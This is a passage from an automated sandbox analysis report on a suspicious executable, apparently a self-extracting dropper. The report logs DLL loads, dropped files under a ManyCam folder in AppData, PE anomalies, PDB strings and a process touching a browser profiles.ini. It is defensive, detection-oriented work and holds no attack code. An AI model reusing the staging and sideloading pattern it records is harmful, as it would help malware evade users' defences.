                  Source: C:\Windows\System32\pcaui.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\pcaui.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msftedit.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: comsvcs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmlua.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: cximagecrt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: cxcore099.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: cv099.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: highgui099.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: crashrpt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: opengl32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: glu32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: glu32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: avifil32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: avicap32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: msvfw32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: msvfw32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: msvfw32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ippopencv099.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ippopencv097.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ippcv-5.1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ippcv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ippcv20.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ippi-5.1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ippi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ippi20.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ipps-5.1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ipps.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ipps20.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ippvm-5.1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ippvm.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ippvm20.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ippcc-5.1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ippcc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ippcc20.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: mkl_p4.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: mkl_p3.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: mkl_def.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: pla.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: pdh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: tdh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: wevtapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: shdocvw.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\pcaui.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\pcaui.exeSection loaded: pcaui.dllJump to behavior
                  Source: C:\Windows\System32\pcaui.exeSection loaded: dui70.dllJump to behavior
                  Source: C:\Windows\System32\pcaui.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\pcaui.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: shdocvw.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                  Source: thiphljqfhe.5.drLNK file: ..\..\Roaming\EH_Monitor_test\ManyCam.exe
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Windows\SysWOW64\msftedit.dllJump to behavior
                  Source: file.exeStatic PE information: Image base 0x140000000 > 0x60000000
                  Source: file.exeStatic file information: File size 5963808 > 1048576
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: d:\branch_2.5\bin\cximagecrt.pdb0 source: ManyCam.exe, 00000001.00000002.1718656549.0000000010062000.00000002.00000001.01000000.0000000A.sdmp, ManyCam.exe, 00000001.00000003.1706834191.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1773874911.0000000010062000.00000002.00000001.01000000.00000012.sdmp, ManyCam.exe, 0000000C.00000002.2155971441.0000000010062000.00000002.00000001.01000000.00000012.sdmp
                  Source: Binary string: d:\branch_2.5\bin\cximagecrt.pdb source: ManyCam.exe, 00000001.00000002.1718656549.0000000010062000.00000002.00000001.01000000.0000000A.sdmp, ManyCam.exe, 00000001.00000003.1706834191.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1773874911.0000000010062000.00000002.00000001.01000000.00000012.sdmp, ManyCam.exe, 0000000C.00000002.2155971441.0000000010062000.00000002.00000001.01000000.00000012.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: Rzu_channel_debug.exe, 0000000B.00000002.2371854721.0000000002CF3000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\Program Files\OpenCV\bin\highgui099.pdb8` source: ManyCam.exe, 00000001.00000003.1707239155.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmp, ManyCam.exe, 00000003.00000002.1772005883.000000000188D000.00000002.00000001.01000000.00000017.sdmp, ManyCam.exe, 0000000C.00000002.2148219294.000000000188D000.00000002.00000001.01000000.00000017.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbAcrobatinerp source: Rzu_channel_debug.exe, 0000000B.00000002.2371854721.0000000002CF3000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\profiles.ini source: Rzu_channel_debug.exe, 0000000B.00000002.2371854721.0000000002D33000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\Program Files\OpenCV\bin\cxcore099.pdb source: ManyCam.exe, 00000001.00000003.1706798211.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000002.1716199035.00000000017E1000.00000002.00000001.01000000.0000000D.sdmp, ManyCam.exe, 00000003.00000002.1771805787.0000000000CC1000.00000002.00000001.01000000.00000013.sdmp, ManyCam.exe, 0000000C.00000002.2147906276.0000000001751000.00000002.00000001.01000000.00000013.sdmp
                  Source: Binary string: ntdll.pdb source: Rzu_channel_debug.exe, 0000000B.00000002.2376874008.00000000069CC000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2376703286.00000000067C9000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2375551356.00000000059CE000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2376367009.00000000063C8000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2375705747.0000000005BC9000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2374752885.00000000051CC000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2375382442.00000000057CC000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2376194096.00000000061C6000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2373132992.0000000003FC7000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2374300838.0000000004BC1000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2374606922.0000000004FCA000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2374147935.00000000049CF000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2373929546.00000000047C5000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2377443683.0000000006FC1000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2377053611.0000000006BC6000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2372608562.00000000039C7000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2372755524.0000000003BC7000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2372901125.0000000003DCE000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371525474.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2373522877.00000000043CE000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2375872473.0000000005DCE000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2375080879.00000000055C1000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2376033721.0000000005FC3000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2377244011.0000000006DCB000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2374913688.00000000053C9000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2376537168.00000000065C4000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2373315397.00000000041CD000.00000004.00000001.00020000.
                  Source: Binary string: wntdll.pdbUGP source: ManyCam.exe, 00000001.00000002.1718312431.0000000005180000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000002.1717640762.0000000004E2B000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1773211813.0000000004AF0000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772167797.0000000001E0F000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1773336558.0000000004EA3000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2083131407.0000000005AE0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082606440.0000000005279000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 0000000C.00000002.2148501151.0000000001E4A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdbUGP source: Rzu_channel_debug.exe, 0000000B.00000002.2376874008.00000000069CC000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2376703286.00000000067C9000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2375551356.00000000059CE000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2376367009.00000000063C8000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2375705747.0000000005BC9000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2374752885.00000000051CC000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2375382442.00000000057CC000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2376194096.00000000061C6000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2373132992.0000000003FC7000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2374300838.0000000004BC1000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2374606922.0000000004FCA000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2374147935.00000000049CF000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2373929546.00000000047C5000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2377443683.0000000006FC1000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2377053611.0000000006BC6000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2372608562.00000000039C7000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2372755524.0000000003BC7000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2372901125.0000000003DCE000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371525474.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2373522877.00000000043CE000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2375872473.0000000005DCE000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2375080879.00000000055C1000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2376033721.0000000005FC3000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2377244011.0000000006DCB000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2374913688.00000000053C9000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2376537168.00000000065C4000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2373315397.00000000041CD000.00000004.00000001.000200
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb831rp source: Rzu_channel_debug.exe, 0000000B.00000002.2371854721.0000000002CF3000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: ManyCam.exe, 00000001.00000002.1718312431.0000000005180000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000002.1717640762.0000000004E2B000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1773211813.0000000004AF0000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772167797.0000000001E0F000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1773336558.0000000004EA3000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2083131407.0000000005AE0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082606440.0000000005279000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 0000000C.00000002.2148501151.0000000001E4A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbAcrobatory source: Rzu_channel_debug.exe, 0000000B.00000002.2371854721.0000000002CF3000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\profiles.iniCDBE0A5831 source: Rzu_channel_debug.exe, 0000000B.00000002.2371854721.0000000002D33000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\Program Files\OpenCV\bin\highgui099.pdb source: ManyCam.exe, 00000001.00000003.1707239155.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmp, ManyCam.exe, 00000003.00000002.1772005883.000000000188D000.00000002.00000001.01000000.00000017.sdmp, ManyCam.exe, 0000000C.00000002.2148219294.000000000188D000.00000002.00000001.01000000.00000017.sdmp
                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: file.exe, 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.1693524385.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmp
                  Source: Binary string: c:\Program Files\OpenCV\bin\cxcore099.pdbu source: ManyCam.exe, 00000001.00000003.1706798211.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000002.1716199035.00000000017E1000.00000002.00000001.01000000.0000000D.sdmp, ManyCam.exe, 00000003.00000002.1771805787.0000000000CC1000.00000002.00000001.01000000.00000013.sdmp, ManyCam.exe, 0000000C.00000002.2147906276.0000000001751000.00000002.00000001.01000000.00000013.sdmp
                  Source: Binary string: c:\Program Files\OpenCV\bin\cv099.pdb source: ManyCam.exe, 00000001.00000003.1706528467.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000002.1716354265.00000000018AF000.00000002.00000001.01000000.0000000E.sdmp, ManyCam.exe, 00000003.00000002.1771522596.0000000000BDF000.00000002.00000001.01000000.00000014.sdmp, ManyCam.exe, 0000000C.00000002.2148083400.000000000181F000.00000002.00000001.01000000.00000014.sdmp
                  Source: Binary string: d:\branch_2.5\bin\ManyCam.pdb source: file.exe, 00000000.00000003.1699413519.0000019994585000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000003.1710918732.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000000.1702094709.000000000053B000.00000002.00000001.01000000.00000009.sdmp, ManyCam.exe, 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmp, ManyCam.exe, 00000003.00000000.1714673779.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 00000003.00000002.1771064003.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000002.2146984400.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000000.2090239557.000000000053B000.00000002.00000001.01000000.00000011.sdmp
                  Source: Binary string: d:\branch_2.5\Bin\CrashRpt.pdb source: ManyCam.exe, 00000001.00000003.1706209188.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000002.1716509296.0000000002012000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000003.00000002.1772302664.0000000002012000.00000002.00000001.01000000.00000015.sdmp
                  Source: Binary string: dbghelp.pdb source: ManyCam.exe, 00000001.00000002.1718820039.000000006D511000.00000020.00000001.01000000.0000000C.sdmp, ManyCam.exe, 00000003.00000002.1773936255.000000006D511000.00000020.00000001.01000000.00000016.sdmp, ManyCam.exe, 0000000C.00000002.2156061238.000000006D511000.00000020.00000001.01000000.00000016.sdmp, ManyCam.exe, 00000013.00000002.2258752567.000000006D511000.00000020.00000001.01000000.00000016.sdmp
                  Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_0052309D IsProcessorFeaturePresent,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapAlloc,InterlockedCompareExchange,GetProcessHeap,HeapFree,1_2_0052309D
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_4126546Jump to behavior
                  Source: dbghelp.dll.1.drStatic PE information: real checksum: 0x8050c should be: 0x7cc68
                  Source: dawfefqddjbx.21.drStatic PE information: real checksum: 0x21278f should be: 0x20b325
                  Source: dbghelp.dll.0.drStatic PE information: real checksum: 0x8050c should be: 0x7cc68
                  Source: file.exeStatic PE information: real checksum: 0x0 should be: 0x5b62a8
                  Source: ydoicpxmibx.5.drStatic PE information: real checksum: 0x21278f should be: 0x20b325
                  Source: file.exeStatic PE information: section name: .didat
                  Source: file.exeStatic PE information: section name: _RDATA
                  Source: Rzu_channel_debug.exe.5.drStatic PE information: section name: Shared
                  Source: ydoicpxmibx.5.drStatic PE information: section name: .xdata
                  Source: ydoicpxmibx.5.drStatic PE information: section name: qdx
                  Source: dawfefqddjbx.21.drStatic PE information: section name: .xdata
                  Source: dawfefqddjbx.21.drStatic PE information: section name: qdx
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_005242D1 push ecx; ret 1_2_005242E4
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_00BDC355 push ecx; ret 1_2_00BDC368
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: 3_2_005242D1 push ecx; ret 3_2_005242E4
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeFile created: C:\Users\user\AppData\Roaming\EH_Monitor_test\CrashRpt.dllJump to dropped file
